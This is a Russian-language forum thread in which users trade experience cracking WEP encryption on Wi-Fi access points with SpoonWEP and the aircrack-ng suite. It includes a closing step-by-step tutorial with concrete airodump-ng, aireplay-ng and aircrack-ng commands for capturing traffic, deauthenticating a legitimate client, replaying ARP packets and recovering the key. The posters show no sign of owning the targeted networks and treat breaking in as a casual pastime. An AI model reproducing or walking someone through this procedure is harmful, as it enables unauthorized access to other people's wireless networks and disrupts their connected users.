Я много раз с ней работал, мне нравиться, поскольку с BT3 плохо умею обращаться. Честно говоря, хорошо нагоняет трафик, но есть AP которые от сылают примерно 1 пакет в минуту, непонятно куда, вот на них не удалось разогнать трафик, а так меня очень радует.
Еще пара вопросов - Сегодня столкнулся с AP на которой был WEP40, честно говоря не совсем понял что это и с чем его едят. Набрал примерно 75000 IVs, но обнаружить ключ не удалось. Опять же принципеально ли различаются методы взлома WEP и WEP40? Вопрос - имеется AP(WEP), набрал 300 000 IVs, но ключа не нашел, имеет ли смысл собирать пакеты дальше?
Я к сожалению не куками запускал, а как раз с помощью SpoonWEP. Я делал через APR Reqest, но насколько я понимаю, это не играет в данном случае никакой роли. А aircrack, пять же, насколько я понимаю там встроен. Это я про WEP40. AP с 300 000 IVs, я тоже ломал с помощью SpoonWEP.
Кстати, на взлом WEP AP с 26 значным ключем у SpoonWEP ушло 5 минут и 50 000 IVs, сигнал был 35%. До включения программы скорость передачи была 2 пакета в секунду.
Ктонибудь посоветуйте wifi pcimcia карту с разъёмом под внешнию антену и имела встроеную антенну, работала нормально в backtrack 3 final и поддерживала monitor mode и инъекцию! и стоила не больше 1000 руб!
Мне конечно тоже весь процесс интересен, но согласись, гораздо приятнее сидеть в кафе с любимой девушкой, общаться, а ключ сам будет подбираться))) Все таки возможно ломануть не получилось, поскольку не ручками был запущен aircrack-ng?(я имею в виду, что без спец параметров)
не надо не в какое кафе! wep ломается за 10 минут включая снифанье! я использовал aircrack-ng aireplay-ng airodump-ng там всё просто! если есть вопросы по параметрам спрашивай!
хорошо! сначала запускаем в консоли команду iwconfig и там смотрим название wifi девайса (должно быть чтото вроде wifiX, wlanX , ethX , athX , вместо X могут быть другие цифры) потом запускаем airodump-ng! пишем в консоль airodump-ng [девайс] далее появится список ТД и и доп. инфа потом выбирай с wepom ТД, смотри на каком она канале её BSSID и ESSID. далее останови airodump-ng (ctrl+c) и запусти с параметрами airodump-ng [девайс] -i -c канал -w capture --bssid FF:FF:FF:FF:FF:FF потом смотри как ловятся пакеты! если бысто то жди а если медленно то надо делать инъекцию(генерацию трафика)! но на возможность инъекции надо проверить твою карту! запускай aireplay-ng [девайс] -9 потом увидишь качество в процентах! чтобы сделать инъекцию надо ассоциироваться с AP! запускай aireplay-ng -1 0 -e <SSID AP> -h <твой MAC> [девайс] подожди увидомления что всё прошло OK и смотри в airodump-ng есть ли там клиенты?! если есть то надо этого клиента вырубить чтоп он нам дал нужные для генерации ARP пакеты! для этого сначала запусти aireplay-ng -3 -e <SSID AP> -h <твой MAC> [девайс] и запустится aireplay-ng на ловлю arp пакетов и в дальнейшем их пересылку! но чтоб этот пакет получить надо как я говорил выше отрубить клиента! запускай aireplay-ng -0 <кол-во отрубающих пакетов> -e <SSID AP> -c <MAC клиента > -h <MAC твой> [девайс] теперь жди когда набегут пакеты(100.000 хватит вполне) и запускай aircrack-ng *.ivs -a 1 и всё! написал как можно понятней и загляни в видио раздел там ещё есть корек chopchop атака генерации трафика которая немного по сложнее!